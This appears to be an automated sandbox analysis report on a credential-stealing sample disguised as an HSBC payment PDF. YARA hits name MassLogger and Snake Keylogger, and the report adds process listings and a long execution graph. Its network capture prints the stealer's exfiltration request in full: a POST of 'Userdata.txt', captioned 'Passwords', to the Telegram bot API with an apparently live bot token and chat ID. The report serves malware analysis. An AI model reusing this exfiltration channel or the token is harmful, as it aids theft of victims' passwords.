Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49736 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 2724 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:24:26 UTC | 299 bytes | OUT | POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1904d11bd5d8
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-10 15:24:26 UTC | 1090 bytes | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 30 34 64 31 31 62 64 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd1904d11bd5d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-10 15:24:26 UTC | 388 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 10 Dec 2024 15:24:26 GMT
Content-Type: application/json
Content-Length: 518
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 15:24:26 UTC | 518 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 38 34 34 32 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79
Data Ascii: {"ok":true,"result":{"message_id":428,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1733844266,"document":{"file_name":"Userdata.txt","mime_ty



Target ID: 0
Start time: 10:24:09
Start date: 10/12/2024
Path: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase: 0x400000
File size: 1'539'072 bytes
MD5 hash: 999146408EFD1A704966CA4C1C8CE4B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'445'888 bytes
                                                                                                                                                  MD5 hash:423F1F6668442F29DF26625C3F1F2479
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                  File size:45'984 bytes
                                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\alg.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'381'376 bytes
                                                                                                                                                  MD5 hash:463F7F1E3383EFC2DF1C247DF13BE675
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:10:24:14
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'242'624 bytes
                                                                                                                                                  MD5 hash:5DA3CAFF7B6DB6ED124E5F9690E7B126
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:10:24:17
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:2'354'176 bytes
                                                                                                                                                  MD5 hash:0B79C87888F1F817B9EF1809AC8DC7F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:10:24:17
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'512'448 bytes
                                                                                                                                                  MD5 hash:680DFBE855D22EE0570837F07CDC45D4
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:10:24:18
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'434'112 bytes
                                                                                                                                                  MD5 hash:51874DD725C538D547DFE65FED3A93E2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:10:24:20
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'391'616 bytes
                                                                                                                                                  MD5 hash:55154595EBC76876D16839386F302C81
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:10:24:21
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'306'624 bytes
                                                                                                                                                  MD5 hash:436D2153822038C49A041E9D657F7E2D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:10:24:22
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\Locator.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                  Imagebase:0x140000000
File size:1'296'896 bytes
MD5 hash:E30FA2BCFDF4D20217D89B9395BE104F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:18
Start time:10:24:24
Start date:10/12/2024
Path:C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\SensorDataService.exe
Imagebase:0x140000000
File size:1'846'784 bytes
MD5 hash:138460F80D6D680988322149C0DA8337
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:19
Start time:10:24:25
Start date:10/12/2024
Path:C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\snmptrap.exe
Imagebase:0x140000000
File size:1'302'528 bytes
MD5 hash:772AEFCF949CAADFB515863053AC8C10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:20
Start time:11:32:40
Start date:10/12/2024
Path:C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\spectrum.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:A5C5CBD638C50F62E6B1C909D40EA394
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:22
Start time:11:32:41
Start date:10/12/2024
Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:0x140000000
File size:1'667'072 bytes
MD5 hash:56CCD164B03367A0F39A8360E82CB3D1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:23
Start time:11:32:42
Start date:10/12/2024
Path:C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\TieringEngineService.exe
Imagebase:0x140000000
File size:1'611'264 bytes
MD5 hash:978A54C9D759FF632658D6B5D6F278B3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:24
Start time:11:32:43
Start date:10/12/2024
Path:C:\Windows\System32\AgentService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AgentService.exe
Imagebase:0x140000000
File size:1'801'216 bytes
MD5 hash:7CFA6C3EAA73B924E9F391CE7ED6CFFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:25
Start time:11:32:44
Start date:10/12/2024
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0x140000000
File size:1'303'552 bytes
MD5 hash:9B69326495A6A2E148AF298DBBFA354E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:27
Start time:11:32:46
Start date:10/12/2024
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\wbengine.exe"
Imagebase:0x140000000
File size:2'164'736 bytes
MD5 hash:A4B1E47A80405B400B4460F9F65BA8E2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:27.9%
Signature Coverage:3.9%
Total number of Nodes:2000
Total number of Limit Nodes:157
180527->180524 180528 42d6c4 180527->180528 180527->180530 180529 42d6f8 GetFileType 180528->180529 180528->180530 180614 429e2b InitializeCriticalSectionAndSpinCount 180528->180614 180529->180528 180530->180522 180530->180525 180530->180526 180615 429e2b InitializeCriticalSectionAndSpinCount 180530->180615 180534 434f34 180533->180534 180535 427d06 180533->180535 180656 42881d 58 API calls 2 library calls 180534->180656 180539 434b1b GetModuleFileNameW 180535->180539 180537 434f5a _memmove 180538 434f70 FreeEnvironmentStringsW 180537->180538 180538->180535 180540 434b4f _wparse_cmdline 180539->180540 180542 434b8f _wparse_cmdline 180540->180542 180657 42881d 58 API calls 2 library calls 180540->180657 180542->180475 180544 434d71 __NMSG_WRITE 180543->180544 180545 434d69 180543->180545 180546 4287d5 __calloc_crt 58 API calls 180544->180546 180545->180479 180553 434d9a __NMSG_WRITE 180546->180553 180547 434df1 180548 422d55 _free 58 API calls 180547->180548 180548->180545 180549 4287d5 __calloc_crt 58 API calls 180549->180553 180550 434e16 180551 422d55 _free 58 API calls 180550->180551 180551->180545 180553->180545 180553->180547 180553->180549 180553->180550 180554 434e2d 180553->180554 180658 434607 58 API calls __setmode 180553->180658 180659 428dc6 IsProcessorFeaturePresent 180554->180659 180556 434e39 180556->180479 180559 4230fb __IsNonwritableInCurrentImage 180557->180559 180682 42a4d1 180559->180682 180560 423119 __initterm_e 180562 423138 __cinit __IsNonwritableInCurrentImage 180560->180562 180685 422d40 180560->180685 180562->180483 180564 4047ea 180563->180564 180574 404889 180563->180574 180565 404824 IsThemeActive 180564->180565 180720 42336c 180565->180720 180569 404850 180732 4048fd SystemParametersInfoW SystemParametersInfoW 180569->180732 180571 40485c 180733 403b3a 180571->180733 180574->180487 180575->180461 180576->180466 180577->180472 180581->180488 180582->180491 180583->180495 180584->180497 180585->180501 180586->180502 180589 4287dc 
180587->180589 180590 428817 180589->180590 180592 4287fa 180589->180592 180596 4351f6 180589->180596 180590->180506 180593 429de6 TlsSetValue 180590->180593 180592->180589 180592->180590 180604 42a132 Sleep 180592->180604 180593->180509 180594->180513 180595->180510 180597 435201 180596->180597 180602 43521c 180596->180602 180598 43520d 180597->180598 180597->180602 180605 428b28 58 API calls __getptd_noexit 180598->180605 180600 43522c RtlAllocateHeap 180601 435212 180600->180601 180600->180602 180601->180589 180602->180600 180602->180601 180606 4233a1 DecodePointer 180602->180606 180604->180592 180605->180601 180606->180602 180608 429c2f EnterCriticalSection 180607->180608 180609 429c1c 180607->180609 180608->180517 180617 429c93 180609->180617 180611 429c22 180611->180608 180641 4230b5 58 API calls 3 library calls 180611->180641 180614->180528 180615->180530 180616->180521 180618 429c9f __setmode 180617->180618 180619 429ca8 180618->180619 180620 429cc0 180618->180620 180642 42a16b 58 API calls __NMSG_WRITE 180619->180642 180633 429ce1 __setmode 180620->180633 180645 42881d 58 API calls 2 library calls 180620->180645 180623 429cad 180643 42a1c8 58 API calls 5 library calls 180623->180643 180625 429cd5 180627 429ceb 180625->180627 180628 429cdc 180625->180628 180626 429cb4 180644 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 180626->180644 180631 429c0b __lock 58 API calls 180627->180631 180646 428b28 58 API calls __getptd_noexit 180628->180646 180634 429cf2 180631->180634 180633->180611 180635 429d17 180634->180635 180636 429cff 180634->180636 180648 422d55 180635->180648 180647 429e2b InitializeCriticalSectionAndSpinCount 180636->180647 180639 429d0b 180654 429d33 LeaveCriticalSection _doexit 180639->180654 180642->180623 180643->180626 180645->180625 180646->180633 180647->180639 180649 422d87 _free 180648->180649 180650 422d5e RtlFreeHeap 180648->180650 180649->180639 180650->180649 180651 422d73 180650->180651 180655 428b28 58 
API calls __getptd_noexit 180651->180655 180653 422d79 GetLastError 180653->180649 180654->180633 180655->180653 180656->180537 180657->180542 180658->180553 180660 428dd1 180659->180660 180665 428c59 180660->180665 180664 428dec 180664->180556 180666 428c73 _memset __call_reportfault 180665->180666 180667 428c93 IsDebuggerPresent 180666->180667 180673 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 180667->180673 180670 428d7a 180672 42a140 GetCurrentProcess TerminateProcess 180670->180672 180671 428d57 __call_reportfault 180674 42c5f6 180671->180674 180672->180664 180673->180671 180675 42c600 IsProcessorFeaturePresent 180674->180675 180676 42c5fe 180674->180676 180678 43590a 180675->180678 180676->180670 180681 4358b9 5 API calls 2 library calls 180678->180681 180680 4359ed 180680->180670 180681->180680 180683 42a4d4 EncodePointer 180682->180683 180683->180683 180684 42a4ee 180683->180684 180684->180560 180688 422c44 180685->180688 180687 422d4b 180687->180562 180689 422c50 __setmode 180688->180689 180696 423217 180689->180696 180695 422c77 __setmode 180695->180687 180697 429c0b __lock 58 API calls 180696->180697 180698 422c59 180697->180698 180699 422c88 DecodePointer DecodePointer 180698->180699 180700 422c65 180699->180700 180701 422cb5 180699->180701 180710 422c82 180700->180710 180701->180700 180713 4287a4 59 API calls __setmode 180701->180713 180703 422cc7 180704 422d18 EncodePointer EncodePointer 180703->180704 180705 422cec 180703->180705 180714 428864 61 API calls 2 library calls 180703->180714 180704->180700 180705->180700 180708 422d06 EncodePointer 180705->180708 180715 428864 61 API calls 2 library calls 180705->180715 180708->180704 180709 422d00 180709->180700 180709->180708 180716 423220 180710->180716 180713->180703 180714->180705 180715->180709 180719 429d75 LeaveCriticalSection 180716->180719 180718 422c87 180718->180695 180719->180718 180721 429c0b __lock 58 API calls 180720->180721 180722 423377 DecodePointer EncodePointer 
180721->180722 180785 429d75 LeaveCriticalSection 180722->180785 180724 404849 180725 4233d4 180724->180725 180726 4233f8 180725->180726 180727 4233de 180725->180727 180726->180569 180727->180726 180786 428b28 58 API calls __getptd_noexit 180727->180786 180729 4233e8 180787 428db6 9 API calls __setmode 180729->180787 180731 4233f3 180731->180569 180732->180571 180734 403b47 __write_nolock 180733->180734 180788 407667 180734->180788 180785->180724 180786->180729 180787->180731 180789 420db6 Mailbox 59 API calls 180788->180789 180790 407688 180789->180790 180791 420db6 Mailbox 59 API calls 180790->180791 180792 403b51 GetCurrentDirectoryW 180791->180792 180793 403766 180792->180793 180794 407667 59 API calls 180793->180794 180795 40377c 180794->180795 181041 403d31 180795->181041 180797 40379a 180798 404706 61 API calls 180797->180798 180799 4037ae 180798->180799 180800 407de1 59 API calls 180799->180800 180801 4037bb 180800->180801 181055 404ddd 180801->181055 180804 43d173 181122 46955b 180804->181122 180805 4037dc Mailbox 180809 408047 59 API calls 180805->180809 180808 43d192 180811 422d55 _free 58 API calls 180808->180811 180812 4037ef 180809->180812 180814 43d19f 180811->180814 181079 40928a 180812->181079 180815 404e4a 84 API calls 180814->180815 180817 43d1a8 180815->180817 180821 403ed0 59 API calls 180817->180821 180818 407de1 59 API calls 180819 403808 180818->180819 181082 4084c0 180819->181082 180823 43d1c3 180821->180823 180822 40381a Mailbox 180824 407de1 59 API calls 180822->180824 180825 403ed0 59 API calls 180823->180825 180826 403840 180824->180826 180827 43d1df 180825->180827 180828 4084c0 69 API calls 180826->180828 180829 404706 61 API calls 180827->180829 180831 40384f Mailbox 180828->180831 180830 43d204 180829->180830 180832 403ed0 59 API calls 180830->180832 180833 407667 59 API calls 180831->180833 180834 43d210 180832->180834 180836 40386d 180833->180836 180835 408047 59 API calls 180834->180835 180837 43d21e 180835->180837 181086 403ed0 
180836->181086 180839 403ed0 59 API calls 180837->180839 180841 43d22d 180839->180841 180847 408047 59 API calls 180841->180847 180843 403887 180843->180817 180844 403891 180843->180844 180845 422efd _W_store_winword 60 API calls 180844->180845 180846 40389c 180845->180846 180846->180823 180848 4038a6 180846->180848 180849 43d24f 180847->180849 180850 422efd _W_store_winword 60 API calls 180848->180850 180851 403ed0 59 API calls 180849->180851 180852 4038b1 180850->180852 180853 43d25c 180851->180853 180852->180827 180854 4038bb 180852->180854 180853->180853 180855 422efd _W_store_winword 60 API calls 180854->180855 180856 4038c6 180855->180856 180856->180841 180857 403907 180856->180857 180858 403ed0 59 API calls 180856->180858 180857->180841 180859 403914 180857->180859 180860 4038ea 180858->180860 181102 4092ce 180859->181102 180862 408047 59 API calls 180860->180862 180864 4038f8 180862->180864 180866 403ed0 59 API calls 180864->180866 180866->180857 181042 403d3e __write_nolock 181041->181042 181043 407bcc 59 API calls 181042->181043 181048 403ea4 Mailbox 181042->181048 181044 403d70 181043->181044 181054 403da6 Mailbox 181044->181054 181163 4079f2 181044->181163 181046 4079f2 59 API calls 181046->181054 181047 403e77 181047->181048 181049 407de1 59 API calls 181047->181049 181048->180797 181050 403e98 181049->181050 181052 403f74 59 API calls 181050->181052 181051 407de1 59 API calls 181051->181054 181052->181048 181054->181046 181054->181047 181054->181048 181054->181051 181166 403f74 181054->181166 181176 404bb5 181055->181176 181060 43d8e6 181063 404e4a 84 API calls 181060->181063 181061 404e08 LoadLibraryExW 181186 404b6a 181061->181186 181065 43d8ed 181063->181065 181067 404b6a 3 API calls 181065->181067 181069 43d8f5 181067->181069 181068 404e2f 181068->181069 181070 404e3b 181068->181070 181212 404f0b 181069->181212 181072 404e4a 84 API calls 181070->181072 181074 4037d4 181072->181074 181074->180804 181074->180805 181076 43d91c 181220 404ec7 
181076->181220 181078 43d929 181080 420db6 Mailbox 59 API calls 181079->181080 181081 4037fb 181080->181081 181081->180818 181083 4084cb 181082->181083 181085 4084f2 181083->181085 181650 4089b3 69 API calls Mailbox 181083->181650 181085->180822 181087 403ef3 181086->181087 181088 403eda 181086->181088 181090 407bcc 59 API calls 181087->181090 181089 408047 59 API calls 181088->181089 181091 403879 181089->181091 181090->181091 181092 422efd 181091->181092 181093 422f09 181092->181093 181094 422f7e 181092->181094 181100 422f2e 181093->181100 181651 428b28 58 API calls __getptd_noexit 181093->181651 181653 422f90 60 API calls 3 library calls 181094->181653 181097 422f8b 181097->180843 181098 422f15 181652 428db6 9 API calls __setmode 181098->181652 181100->180843 181101 422f20 181101->180843 181103 4092d6 181102->181103 181104 420db6 Mailbox 59 API calls 181103->181104 181105 4092e4 181104->181105 181106 403924 181105->181106 181654 4091fc 59 API calls Mailbox 181105->181654 181108 409050 181106->181108 181123 404ee5 85 API calls 181122->181123 181124 4695ca 181123->181124 181666 469734 181124->181666 181127 404f0b 74 API calls 181128 4695f7 181127->181128 181129 404f0b 74 API calls 181128->181129 181130 469607 181129->181130 181131 404f0b 74 API calls 181130->181131 181132 469622 181131->181132 181133 404f0b 74 API calls 181132->181133 181134 46963d 181133->181134 181135 404ee5 85 API calls 181134->181135 181136 469654 181135->181136 181137 42571c __crtLCMapStringA_stat 58 API calls 181136->181137 181138 46965b 181137->181138 181139 42571c __crtLCMapStringA_stat 58 API calls 181138->181139 181140 469665 181139->181140 181141 404f0b 74 API calls 181140->181141 181142 469679 181141->181142 181143 469109 GetSystemTimeAsFileTime 181142->181143 181144 46968c 181143->181144 181145 4696b6 181144->181145 181146 4696a1 181144->181146 181147 4696bc 181145->181147 181148 46971b 181145->181148 181149 422d55 _free 58 API calls 181146->181149 181672 468b06 181147->181672 181151 
422d55 _free 58 API calls 181148->181151 181152 4696a7 181149->181152 181155 43d186 181151->181155 181154 422d55 _free 58 API calls 181152->181154 181154->181155 181155->180808 181157 404e4a 181155->181157 181156 422d55 _free 58 API calls 181156->181155 181158 404e54 181157->181158 181159 404e5b 181157->181159 181160 4253a6 __fcloseall 83 API calls 181158->181160 181161 404e6a 181159->181161 181162 404e7b FreeLibrary 181159->181162 181160->181159 181161->180808 181162->181161 181172 407e4f 181163->181172 181165 4079fd 181165->181044 181167 403f82 181166->181167 181171 403fa4 _memmove 181166->181171 181169 420db6 Mailbox 59 API calls 181167->181169 181168 420db6 Mailbox 59 API calls 181170 403fb8 181168->181170 181169->181171 181170->181054 181171->181168 181173 407e62 181172->181173 181175 407e5f _memmove 181172->181175 181174 420db6 Mailbox 59 API calls 181173->181174 181174->181175 181175->181165 181225 404c03 181176->181225 181179 404bdc 181180 404bf5 181179->181180 181181 404bec FreeLibrary 181179->181181 181183 42525b 181180->181183 181181->181180 181182 404c03 2 API calls 181182->181179 181229 425270 181183->181229 181185 404dfc 181185->181060 181185->181061 181387 404c36 181186->181387 181189 404ba1 FreeLibrary 181190 404baa 181189->181190 181193 404c70 181190->181193 181191 404c36 2 API calls 181192 404b8f 181191->181192 181192->181189 181192->181190 181194 420db6 Mailbox 59 API calls 181193->181194 181195 404c85 181194->181195 181391 40522e 181195->181391 181197 404c91 _memmove 181197->181197 181198 404ccc 181197->181198 181199 404dc1 181197->181199 181200 404d89 181197->181200 181201 404ec7 69 API calls 181198->181201 181405 